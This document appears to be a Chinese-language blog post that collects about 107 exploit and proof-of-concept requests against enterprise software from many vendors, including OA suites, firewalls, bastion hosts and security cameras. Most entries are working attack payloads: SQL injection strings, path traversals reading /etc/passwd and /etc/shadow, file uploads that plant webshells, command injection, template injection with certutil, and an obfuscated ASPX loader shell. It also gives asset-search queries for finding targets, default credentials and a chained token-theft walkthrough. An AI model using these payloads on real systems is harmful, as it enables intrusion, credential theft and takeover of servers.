150个常见厂商的POC合集-包含部分exp
一、杨CC对工具的评价
部分来源于2023HW发现的漏洞POC,包含多个厂商。
部分来源于公众号,部分来源于网络。
二、POC合集
1、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
POC
1 | POST /changepass.php?type=2 |
2、网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
1 | POST /?g=obj_app_upfile HTTP/1.1 |
马儿路径:attachements/xxx.php
3、通达OA sql注入漏洞 CVE-2023-4166
1 | GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 |
4、通达OA sql注入漏洞 CVE-2023-4165 POC
1 | GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 |
5、深信服应用交付系统命令执行漏洞 POC
1 | POST /rep/login |
1 | POST /rep/login HTTP/1.1 |
1 | HTTP/1.1 200 OK |
6、广联达oa sql注入漏洞 POC
1 | POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 |
7、深信服 sxf-报表系统 版本有限制
POC
1 | POST /rep/login HTTP/1.1 |
8、绿盟sas安全审计系统任意文件读取漏洞POC
1 | /webconf/GetFile/index``?``path=../../../../../../../../../../../../../../etc/passwd |
9、蓝凌OA前台代码执行
POC
1 | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 |
10、金山WPS RCE
wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120
WPS Office 2019 企业版 < 11.8.2.12085
POC
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
代码块在底下。(需要原pdf加wechat)
1 | <script> |
11、汉得SRM tomcat.jsp 登录绕过漏洞 POC
1 | /tomcat.jsp?dataName=role_id&dataValue=1 |
然后访问后台:/main.screen
12、广联达oa 后台文件上传漏洞 POC
1 | POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 |
13、广联达oa sql注入漏洞 POC
1 | POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 |
14、泛微E-Office9文件上传漏洞 CVE-2023-2648 POC
1 | POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 |
15、泛微E-Office9文件上传漏洞 CVE-2023-2523 POC
1 | POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 |
16、辰信景云终端安全管理系统 login SQL注入漏洞 POC
1 | POST /api/user/login |
17、安恒明御运维审计与风险控制系统堡垒机任意用户注册
1 | POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 |
18、HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC
fofa查询语句
icon_hash=“-808437027” app=“HIKVISION-iSecure-Center”
EXP/POC:payload.py 脚本 走127.0.0.1:8080 代理,方便burpsuit抓包。
1 | #!usr/bin/env python |
burpsuit抓包分析
burpsuit 127.0.0.1:8080抓包,抓取post 包一个,get 请求包一个。 payload:请求数据包
1 | POST /center/api/files;.js HTTP/1.1 |
payload的返回数据包。
1 | HTTP/1.1 200 |
访问漏洞链接:https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ,查看是否上传成功。
因为Hikvision平台使用的中间件为tomcat,修改报文和文件名,所以实现上传哥斯拉生成jsp。 宿主服务器windows和linux都可使用。windows 拿到的账户是system账户,linux为root。 Hikvison账户管理密码的后渗透操作:海康威视综合安防后渗透利用技巧
POC2
1 | POST /center/api/files;.html HTTP/1.1 |
report 任意文件上传漏洞
1 | POST /svm/api/external/report HTTP/1.1 |
马儿路径:/portal/ui/login/..;/..;/new.jsp
19、HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
1 | POST /center/api/files;.html HTTP/1.1 |
20、Exchange Server远程代码执行漏洞(CVE-2023-38182)风险通告
待补充poc exp
描述和影响范围
Exchange Server 2019 Cumulative Update 13
Exchange Server 2019 Cumulative Update 12
Exchange Server 2019 Cumulative Update 11
Exchange Server 2016 Cumulative Update 23
需要有普通用户权限
21、Coremail远程代码执行漏洞(官方已辟谣)
22、泛微 E-Cology 某版本 SQL注入漏洞 POC
1 | POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1 |
23、金和OA C6-GetSqlData.aspx SQL注入漏洞 POC
1 | POST /C6/Control/GetSqlData.aspx/.ashx |
24、大华智慧园区综合管理平台 searchJson SQL注入漏洞 POC
1 | GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 |
25、大华智慧园区综合管理平台 文件上传漏洞 POC
1 | POST /publishing/publishing/material/file/video HTTP/1.1 |
26、用友时空KSOA PayBill SQL注入漏洞 POC
1 | POST /servlet/PayBill?caculate&_rnd= HTTP/1.1 |
27、绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞 POC
1 | GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 |
28、绿盟 SAS堡垒机 GetFile 任意文件读取漏洞 POC
1 | GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 |
29、绿盟 SAS堡垒机 Exec 远程命令执行漏洞 POC
1 | GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1 |
30、用友移动管理系 统 uploadApk.do 任意文件上传漏洞
1 | POST /maportal/appmanager/uploadApk.do?pk_obj=0001A1100000000H66QB HTTP/1.1 |
31、启明天钥安全网关前台sql注入
1 | POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 |
32、用友M1server反序列化命令执行漏洞
漏洞描述:
M1移动协同是针对管理者、高端商务人士、长期在外走访客户的业务人员以及日常外出的行业者而打造的协同应用。该应用平台存在反序列化漏洞,攻击者构造恶意包可以执行任意命令获取服务器权限
POC待补充
33、启明星辰-4A 统一安全管控平台 getMater 信息泄漏
漏洞描述:
启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
GET /accountApi/getMaster.do
poc: relative: req0 session: false requests: - method: GET timeout: 10 path: /accountApi/getMaster.do headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36 follow_redirects: true matches: (code.eq(“200”) && body.contains(“"state":true”))
修复建议:
限制文件访问
34、锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
漏洞描述:锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞
批量扫描工具:
1 | GET /EXCU_SHELL HTTP/1.1 |
35、科荣 AIO 管理系统存在文件读取漏洞
漏洞描述:
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在文件读取漏洞,攻击者可以读取敏感文件。
1 | POST /UtilServlet HTTP/1.1 |
36、飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞
漏洞描述:
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
漏洞影响 : 飞企互联 FE业务协作平台
网络测绘:
“flyrise.stopBackspace.js”
验证POC
1 | /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print |
37、用友GRP-U8存在信息泄露
漏洞描述:友U8系统存可直接访问log日志,泄露敏感信息
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8
1 | GET /logs/info.log HTTP/1.1 |
38、nginx配置错误导致的路径穿越风险
漏洞自查PoC如下: https://github.com/hakaioffsec/navgix 该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。 有多家重点金融企业已中招,建议尽快进行自查。
39、红帆OA zyy_AttFile.asmx SQL注入漏洞
POC:
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: “http://tempuri.org/GetFileAtt“ Accept-Encoding: gzip, deflate Connection: close <soap:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance“ xmlns:xsd=”http://www.w3.org/2001/XMLSchema“ xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/">soap:Body
修复方法
官方已发布安全修复版本,请升级至官网最新版本 https://www.ioffice.cn/
40、Coremail 邮件系统未授权访问获取管理员账密
POC:
1 | /coremail/common/assets/:/:/:/:/:/:/s? |
41、Milesight VPN server.js 任意文件读取漏洞
POC:
1 | GET /../etc/passwd HTTP/1.1 |
42、PigCMS action_flashUpload 任意文件上传漏洞
POC:
1 | POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload |
43、绿盟 NF 下一代防火墙 任意文件上传漏洞
POC:
1 | POST /api/v1/device/bugsInfo HTTP/1.1 |
1 | POST /mail/include/header_main.php HTTP/1.1 |
44、金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞
POC: /admin/weichatcfg/getsysteminfo
**漏洞描述:**北京金盘鹏图软件技术有限公司的金盘图书馆微信管理后台 getsysteminfo 存在未授权访问漏洞
**漏洞危害:**获取管理员账号密码等敏感数据,导致攻击者能以管理员身份进入系统窃取敏感信息和危险操作
修复方法:
官方已发布安全修复版本,请升级至官网最新版本 http://goldlib.com.cn/
45、Panel loadfile 后台文件读取漏洞
POC:
1 | POST /api/v1/file/loadfile {"paht":"/etc/passwd"} |
46、网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
POC:
1 | GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1 |
47、广联达 Linkworks GetIMDictionarySQL 注入漏洞
POC:
1 | POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded |
48、用友文件服务器认证绕过
资产搜索:
app=”用友-NC-Cloud” 或者是app=”用友-NC-Cloud” && server==”Apache-Coyote/1.1”
POST数据包修改返回包 false改成ture就可以绕过登陆
1 | HTTP/1.1 200 OK |
49、华天动力oa SQL注入
访问
http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
然后抓包
1 | POST /report/reportServlet?action=8 HTTP/1.1 |
48、49漏洞来源于:https://mp.weixin.qq.com/s/hUig93-cSFtbioQpPSNZig
50、泛微 Weaver E-Office9 前台文件包含
(网友ZEROS贡献)
51、企业微信(私有化版本)敏感信息泄露漏洞
紧急通知,长亭报出企业微信存在信息泄露0day!目前已在准备预警,请注意!
企业微信URL/cgi-bin/gateway/agentinfo
接口未授权情况下可直接获取企业微信secret等敏感信息
受影响版本:2.5.x、2.6.930000、以下;
不受影响:2.7.x、2.8.x、2.9.x;
危害:
1、可导致企业微信全量数据被获取、文件获取,
2、存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。
修复方法:
1、在waf上设置一个规则,匹配到/cgi-bin/gateway/agentinfo路径的进行阻断;
2、联系厂家进行获取修复包;
3、官方通报及补丁地址
复现及漏洞详情分析:
第一步:,通过泄露信息接口可以获取corpid和corpsecret
https://<企业微信域名>/cgi-bin/gateway/agentinfo
第二步,使用corpsecret和corpid获得token
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
第三步,使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口
https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
52、帆软报表系统漏洞威胁
情况说明:帆软报表系统(V10、V11及更早期版本)存在反序列化漏洞绕过、反序列化命令执行等高危漏洞,攻击者可利用上述漏洞获取系统权限。鉴于该漏洞影响范围较大,潜在危害程度极高,建议引起高度重视,通过官方发布的链接下载补丁,进行升级,消除安全隐患,提高安全防范能力。
漏洞详细信息: https://help.fanruan.com/finereport/doc-view-4833.html
补丁下载链接: http: //s.fanruan.com/3u6eo
53、蓝凌EKP远程代码执行漏洞
受影响版本:
蓝凌EKP V16 (最新版)受影响存在远程代码执行漏洞;V15暂无环境验证,可能受影响。
修复方案:
使用网络ACL限制该OA的访问来源,加强监测,重点拦截GET请求中带有../等目录穿越特征的URL。
通过文件上传–>解压–>获取webshell,前台漏洞
漏洞路径:
1 | /api///sys/ui/sys_ui_extend/sysUiExtend.do |
54、Smartx超融合远程命令执行漏洞
SmartX超融合系统是构建超融合平台的核心软件,能够基于不同虚拟化平台和软硬件的交付方式实现超融合架构。Smartx超融合系统存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。
受影响版本:Smartx超融合version <= 5.0.5受影响存在漏洞;最新版暂无环境验证,可能受影响。
修复方案:使用网络ACL限制该产品的访问来源,加强监测,重点拦截GET请求中带有操作系统命令注入特征的URL;
临时修复方案:
重点拦截访问 /api/v2/deployment/can_ping的可疑ip
55、Nacos-Sync未授权漏洞
https://xxx.xxx.xxx/#/serviceSync
56、360 新天擎终端安全管理系统信息泄露漏洞
http://ip:port/runtime/admin_log_conf.cache
57、锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
1 | POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1 |
58、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
1 | POST /changepass.php?type=2 |
59、Openfire身份认证绕过漏洞(CVE-2023-32315)
1 | GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1 |
59、大华智慧园区综合管理平台 user_getUserInfoByUserName.action 任意密码读取漏洞
1 | GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) |
60、泛微 ShowDocsImagesql注入漏洞
1 | GET |
61、宏景 HCM codesettree SQL 注入漏洞
1 | GET |
61、用友时空 KSOATaskRequestServlet sql注入漏洞
1 | /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1, |
62、用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
1 | GET |
63、用友畅捷通 T注入
1 | sqlmap -u http://xx.xx.xx.xx/WebSer~1/create_site.php?site_id=1 --is-dba |
64、宏景OA文件上传
1 | POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1 |
shell:http://xx.xx.xx.xx/1ndex.jsp
65、金和OA 未授权
- 漏洞链接
http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1
- 复现步骤
66、Kuboard默认口令
漏洞描述:
Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。
admin/kuboard123
67、QAX-Vpn存在x遍历及任意账号密码修改漏洞
1 | https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1 |
68、有用畅捷通T+GetStoreWarehouseByStore RCE漏洞
1 | POST |
69、契约锁电子签章系统 RCE
1 | POST /callback/%2E%2E;/code/upload HTTP/1.1 |
70、任我行 CRM SmsDataList SQL注入漏洞
1 | POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 |
71、深信服数据中心管理系统 XML 实体注入漏洞
1 | GET /src/sangforindex HTTP/1.1 |
72、明源云 ERP ApiUpdate.ashx 文件上传漏洞
1 | POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1Host: target.com |
73、泛微 HrmCareerApplyPerView S Q L 注入漏洞
1 | GET |
74、Metabase validate 远程命令执行漏洞(CVE-2023-38646)
漏洞描述
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松连接到各种数据源,包括数据库、云服务和API,然后使用绘图的界面进行数据查询、分析和可视化。需身份认证的远程攻击者利用该漏洞可以在服务器上以运行元数据库服务器的权限执行任意命令
漏洞影响
元数据库
网络测绘
应用程序=“元数据库”
漏洞复现
POC
1 | /api/session/properties |
1 | POST /api/setup/validate HTTP/1.1 |
75、KubePi JwtSigKey 登陆绕过漏洞(CVE-2023-22463)
漏洞描述
KubePi 中存在 JWT 硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
漏洞影响
库贝派
网络测绘
“库贝皮”
漏洞复现
登陆页面
1 | POST /kubepi/api/v1/users HTTP/1.1 |
纯文本
76、禅道 16.5 router.class.php SQL注入漏洞
POST /user-login.html
account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
77、金山EDR RCE漏洞
开启⽇志 /Console/inter/handler/change_white_list_cmd.php id参数
1 | POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 |
设置日志php文件
1 | POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 |
写入php代码
1 | POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1 |
最后get请求rce:
1 | http://192.168.24.3:6868/check_login2.php |
78、Panabit iXCache网关RCE漏洞CVE-2023-38646
1 | POST /cgi-bin/Maintain/date_config HTTP/1.1 |
79、金和OA C6-GetSgIData.aspx SQL注入漏洞
1 | POST /c6/Contro/GetSglData.aspx/.ashx |
80、致远OA任意管理员登录
1 | POST /seeyon/thirdpartyController.do HTTP/1.1 |
81、用友nc-cloudRCE
漏洞影响
NC63、NC633、NC65
NC Cloud1903、NC Cloud1909
NC Cloud2005、NC Cloud2105、NC Cloud2111
YonBIP高级版2207
先发送数据包,返回200
1 | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 |
再发送数据包执行命令,返回命令执行结果
1 | POST /404.jsp?error=bsh.Interpreter HTTP/1.1 |
82、用友 NC Cloud jsinvoke 任意文件上传漏洞
漏洞描述
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
app=”用友-NC-Cloud”
1 | POST /uapjs/jsinvoke/?action=invoke |
83、亿赛通 /UploadFileFromClientServiceForClient 任意文件上传漏洞
漏洞描述:亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件。亿赛通电子文档安全管理系统任意文件上传
漏洞危害:攻击者可以上传恶意文件,获得服务器权限
修复方法
官网已发布安全修复版本,请升级至官网最新版本 https://www.esafenet.com/
84、Jeecg-Boot Freemarker 模版注入漏洞
漏洞危害
1、如果被攻击者利用,可直接getshell; 2、如果被攻击者利用,可被用于内网信息收集,扫描目标内网主机; 3、如果被攻击者利用,可攻击运行在内网或本地的应用程序; 4、如果被攻击者利用,可被用作攻击跳板;
修复方法
Jeecg官方暂未修复该漏洞,无法通过升级JeecgBoot版本修复该漏洞,建议: 1、临时禁用Freemarker高危的代码执行类,如:freemarker.template.utility.Execute(ftl利用方式较多,请自行判断)
1 | POST /jeecg-boot/jmreport/qurestSql HTTP/1.1 |
85、远秋医学技能考试系统SQL注入
1 | sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -p id -batch |
86、新开普智慧校园系统代码执行漏洞
漏洞详情
新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷。
路径存在则漏洞存在
http://xxx.com/service_transport/service.action
纯文本
poc没回显
1 | POST /service_transport/service.action HTTP/1.1 |
纯文本
写文件
1 | POST /service_transport/service.action HTTP/1.1 |
纯文本
文件转换为jsp
1 | POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 { "command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}" } |
87、拓尔思 MAS 任意文件上传漏洞
88、金山终端安全系统V9任意文件上传漏洞
1 | POST /inter/software_relation.php HTTP/1.1 |
89、Eramba任意代码执行漏洞
影响版本:Enterprise and Community edition <= 3.19.1
1 | GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1 Host: [redacted] Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://[redacted]/settings Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close |
1 | HTTP/1.1 500 Internal Server Error Date: Fri, 31 Mar 2023 12:37:55 GMT Server: Apache/2.4.41 (Ubuntu) Access-Control-Allow-Origin: * Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Disposition: attachment; filename="test.pdf" X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2033469 <!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Error: The exit status code '127' says something went wrong: stderr: "sh: 1: --dpi: not found " stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether [redacted] brd ff:ff:ff:ff:ff:ff inet [redacted] brd [redacted] scope global ens33 valid_lft forever preferred_lft forever inet6 [redacted] scope link valid_lft forever preferred_lft forever " command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html' '/tmp/knp_snappy6426d423104587.46971034.pdf'. </title> [...] |
90、Adobe ColdFusion 反序列化漏洞CVE-2023-29300
1 | POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1 |
91、1Panel loadfile 后台文件读取漏洞
漏洞描述
1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件
POC
1 | POST /api/v1/file/loadfile {"paht":"/etc/passwd"} |
漏洞复现
登陆页面
92、金蝶云星空 CommonFileserver 任意文件读取漏洞
1 | GET /CommonFileServer/c:/windows/win.ini |
**93、**CODING平台idna目录存在目录遍历漏洞
Coding.net 是一个面向开发者的云端开发平台,提供 Git/SVN 代码托管、任务管理,在idna存在目录泄露漏洞,攻击者可获取目录文件信息。
94、中远麒麟堡垒机SQL注入
麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入,可利用该漏洞获取系统敏感信息。
检索条件:
cert=”Baolei”||title=”麒麟堡垒机”||body=”admin.php?controller=admin_index&action=get_user_login_fristauth”||body=”admin.php?controller=admin_index&action=login”
poc: relative: req0 && req1 session: false requests: - method: POST timeout: 10 path: /admin.php?controller=admin_commonuser headers: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 data: username=admin’ AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND ‘AAdm’=’AAdm follow_redirects: true matches: (code.eq(“200”) && time.gt(“5”) && time.lt(“10”)) - method: POST timeout: 10 path: /admin.php?controller=admin_commonuser headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36 Content-Type: application/x-www-form-urlencoded data: username=admin follow_redirects: true matches: time.lt(“5”)
95、用友NC存在JNDI注入漏洞
待补充。
96、OfficeWeb365 远程代码执行漏洞
【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经升级漏洞云情报平台,平台编号: 360LDYLD-2023-00002453
#详细
1 | POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1 |
</脚本>
<%
//byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance(“U”).Equals(this);
byte[] c=Request.BinaryRead(Request.ContentLength);
string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
类型程序集=Type.GetType(asname);
MethodInfo load = assembly.GetMethod(“Load”,new Type[] {new byte[0].GetType()});
对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
MethodInfo create = assembly.GetMethod(“CreateInstance”,new Type[] { “”.GetType()});
字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
object pay=create.Invoke(obj,new object[] { name });
pay.Equals(this);%>>—
97、gitlab路径遍历读取任意文件漏洞
可能需要登录
1 | GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
98、360 天擎终端安全管理系统前台文件上传漏洞
1 | POST /rptsvr/upload HTTP/1.1 |
99、Citrix ADC&Citrix Gateway 远程代码执行漏洞
1 | POST /saml/login HTTP/1.1 |
100、DzzOffice RCE
通过随机数安全得到 authkey,加密后,发送 payload
1 | POST /core/api/wopi/index.php?access_token=1&action=contents&path=MTQxZGw4UWs2YmEwcUswVWMwYzNkcVprcXc2NWNaeERVZWIxZmNJMGVSQ2NGbTBUTUFzSTJmc1c1LTczRGFEZDZHNDFxRU13WXFEeDEwdFJNb28= HTTP/1.1 |
101、GitLab 目录遍历漏洞
1 | /test/test1/test2/test3/test4/test5/test6/test7/test8/111/uploads/2ac45b38daa86ac6f81eac0d5 |
102、H3C CAS 虚拟化管理系统 前台任意文件上传漏洞
1 | POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/uploadtest233.jsp&name=333 HTTP/1.1 |
103、Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
title=”index” && header=”lighttpd/1.4.30”
1 | /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921 |
104、IBM Storwize 存储管理系统命令执行漏洞
1 | #!/usr/bin/python |
105、LiveBos ShowImage.do文件imgName参数读取漏洞
LiveBOS(简称LiveBOS)是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。LiveBos ShowImage.do文件imgName 参数存在文件读取漏洞,攻击者可以获取大量敏感信息。
Condition: body=”LiveBos” || body=”/react/browser/loginBackground.png”
1 | relative: req0 |
106、nginxWebUI 远程命令执行漏洞
EXP1:
1 | GET /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginxn HTTP/1.1 |
EXP2:
1 | POST /Api/nginx/runNginxCmd HTTP/1.1 |
EXP3:
1 | GET /AdminPage/conf/reload?nginxExe=ping%20r17iws.dnslog.cn%20%7C HTTP/1.1 |
107、OfficeWeb365 SSRF 文件上传漏洞
来源:微步 公开信息
漏洞信息:
详情信息:
